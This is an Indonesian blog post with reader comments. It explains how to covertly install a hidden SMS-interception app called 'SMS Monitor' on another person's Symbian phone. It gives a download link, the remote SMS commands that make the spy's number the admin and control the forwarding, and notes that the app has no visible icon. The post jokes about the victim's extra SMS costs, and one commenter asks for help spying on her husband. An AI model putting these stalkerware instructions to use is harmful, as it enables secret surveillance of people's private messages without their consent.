Senin, 11 April 2011

Sadap Sms Dengan Aplikasi Tersembunyi




    Masih membahas aplikasi tentang SMS gan, Posting OzHIE kali ini  adalah request dari Agan Willy Rustiadi di FB, Aplikasi ini bernama SMS Monitor, bisa menyadap sms dari ponsel lain ke ponsel kita meski ponsel kita jadul gak apa lah tapi syaratnya ponsel yang kita sadap harus ponsel yang barbasis Symbian s60 v3 v5, tapi ingat gan aplikasi ini dapat mengirim semua aktifitas sms dari ponsel yang kita sadap jadi kasihan yang punya ponsel akan terkena biaya sms 3x lipat, he he he..

Nah sebelum kita lanjut ke cara kerjanya silahkan sedot aplikasinya terlebih dahulu pada link di bawah ini :

Download :
SMS_Monitor_v1.0_s60v3.s60v5.zip  449 KB

    Install aplikasi tersebut pada ponsel yang akan kita sadap, jangan hawatir aplikasi ini tidak mempunyai Icon di menu jadi tak akan kelihatan jika ada aplikasi baru di ponsel korban yang ada hanya nama progaram di  Manager Aplikasi saja.
    Langkah selanjutnya Kirim sms yang ber format ( Set Admin <spasi> Nomor Penyadap ) dari Ponsel yang kita jadikan untuk menyadap, tipe ponsel apapun gak masalah gan yang penting ada pulsanya, he he he.. Sebagai contoh adalah ponsel N81 temen saya yang memakai nomor Tree dan ponsel yang akan di sadap adalah ponsel N81 8GB Saya yang memakai kartu Im3.



Dan ini adalah contoh hasil Sadapan di ponsel N81 teman saya dari ponsel N81 8GB Saya saat melakukan sms testing ke nomor im3 lain yang otomatis lansung di kirim ke ponsel N81 temen saya oleh aplikasi tersebut.



Nah sudah jelas kan..!! selain Kode di atas ada Fungsi lain untuk menjalankan aplikasi tersebut yang di tujukan ke nomor Ponsel yang di sadap :

=> Off  : Untuk menghentikan sementara penyadapan

=> On  : Untuk menghidupkan kembali penyadapan

=> Add sender +62856xxxxxx,+62856xxxxxx  : Untuk menyadap aktifitas sms dari dan ke nomer tertentu saja

=> Add  : Untuk kembali menyadap semua nomor

=> Block on  : Untuk memblok semua aktifitas telpon masuk dan keluar yang disadap

=> Block off  : Untuk mematikan blokir telpon diatas (defaultnya ini yang aktif)


Catatan : Saya minta kepeda sobat blogger jangan menggunakan aplikasi ini utuk mencederai privasi seseorang atau hal - hal iLegal lainnya !!!! Ok Coy...!!!

----+@ Selamat Mencoba @+----

10 komentar:

brexsedenx mengatakan...

kunjungan pagi bro, btw blognya berat di loading nich, lo bs cb pke css biar enteng, thanks bro

OzHIE.sisX mengatakan...

kan di bawah udah ada link tampilan mobile gan,,! thx tas kunjungannya...!

rosu mengatakan...

bro koq ngga bisa sih, emangnya setelah kita install aplikasi langsung aktif. Kok ngga bisa si bro. Format sms nya gmana sih bro? Cra diatas udah dcoba? Tx

OzHIE.sisX mengatakan...

pake Hp buat sadap kirim Keti Set Admin kirim ke hp yg di sadap....

ryan cool mengatakan...

succesfull bro tx. Oya nyadap telpon bisa juga ngga bro?

OzHIE.sisX mengatakan...

ada ce tp blm sempet posting..!!!

Anonim mengatakan...

buat sadap HP BB ada ga gan,,

OzHIE.sisX mengatakan...

wah hp bb ane kagak tau gan,,,!!!

nita rose mengatakan...
Komentar ini telah dihapus oleh pengarang.
nita rose mengatakan...

saya mw bgt coba aplikasi sadap ini d hp suami aq, tp saya gk ngerti ne, entr lgsung caba eeh malah salah. suami aq pake hp samsung galaxi Y.
di hp capa kita ketik set admin tu? pa d hp suami aq? trs kirim ke hp aq gt ya??
tlng ya d jelasin? thank's a lot :)

Poskan Komentar

Boleh coment jangan Spam, Usahakan jangan pakai Anonim, jika pake Anonim usahakan di belakang coment di beri nama, Kalau mau bertanya silahkan sebutkan tipe HP....!!!